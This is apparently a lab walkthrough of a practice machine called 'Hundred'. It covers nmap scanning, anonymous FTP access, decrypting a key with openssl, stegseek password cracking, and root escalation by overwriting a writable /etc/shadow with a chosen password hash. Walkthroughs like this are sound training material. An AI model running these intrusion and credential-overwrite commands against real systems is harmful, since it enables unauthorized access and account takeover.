Hundred

When starting the machine, we see the IP of the victim machine.

IP of the victim machine

So, I decide to use NMAP to scan for open ports and provide me with information about the services and other details related to these open ports.

sudo nmap -sS -p- --min-rate 4500 -n -Pn 192.168.18.181

nmap -sCV -p21,22,80 -n -Pn 192.168.18.181 -oN target

NMAP scan

And we observe that port 21 (FTP) is vulnerable to an Anonymous Login. So, I decide to log in since the scan indicates that there are files of interest.

Inside port 21 (FTP)

Now that we're inside, I decide to download the file users.txt with the following command:

get users.txth

And on my local machine, I check to see what's there, and it appears to be a dictionary. But at the bottom, we can notice a username (hmv).

Users.txt file

Later, upon downloading the id_rsa, we see that it's a drawing of a rabbit.

id_rsa is a rabbit

And we observe that id_rsa.pem seems to be a private id_rsa key.

id_rsa.pem file

I grant privileges to the private key and try to access, but it doesn't work.

So, it seemed that the rabbit drawing indicated that the id_rsa was just a "rabbit hole".

I decide to go through port 80 (HTTP).

Homepage

Source code of the homepage

We can observe a value named 'key' that contains some strange text. I notice that it's an '.enc' file. We can decode the file using the RSA private key and OpenSSL.

We use the private key file and the downloaded file, and it generates a directory:

openssl pkeyutl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key

cat key

As it says it's there (...), I decide to use Gobuster to search and see if there are any subdirectories or files within this directory.

Directory and file enumeration with Gobuster

And we come across another id_rsa. So, I download it.

wget http://192.168.18.181/softyhackb4el7dshelldredd/id_rsa

We obtain the id_rsa

As we can see, it appears to be a private key. Let's see if it works:

Unfortunately, it's asking for a password.

For the next step, we'll need to download the image from the webpage and use steganography techniques to extract information from the image.

wget http://192.168.18.181/logo.jpg

I decide to use Stegseek with the dictionary we obtained earlier from port 21 (FTP).

stegseek logo.jpg users.txt

We use Stegseek

And we obtain the password that the private key was asking for. So, I manage to access and become the user hmv:

We are the user hmv

And we obtain the user flag.

There is only the user hmv and the root user.

Now let's begin the privilege escalation.

After tinkering for a while and using tools like pspy64 and LinPeas without any success, I decide to use the lse.sh script, which is designed to display relevant information about local Linux system security, helping us with privilege escalation.

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh

./lse.sh -l1

This last command is used to display information in more detail.

As a result, we see that the /etc/shadow file can be edited.

Critical file can be edited: /etc/shadow

To change the root password in the /etc/shadow file, we will use the following commands:

openssl passwd

This is used to generate the password in hash format.

And since I can't edit the /etc/shadow file directly using a text editor like nano, we'll have to overwrite the entire file. So, our only option is to execute the following command:

echo root:e84V4zPcic2M2:18844:0:99999:7::: > /etc/shadow

We are root now

And we access the root user with our password.

And there we go, we obtain the root flag, and we've successfully finished hacking this machine.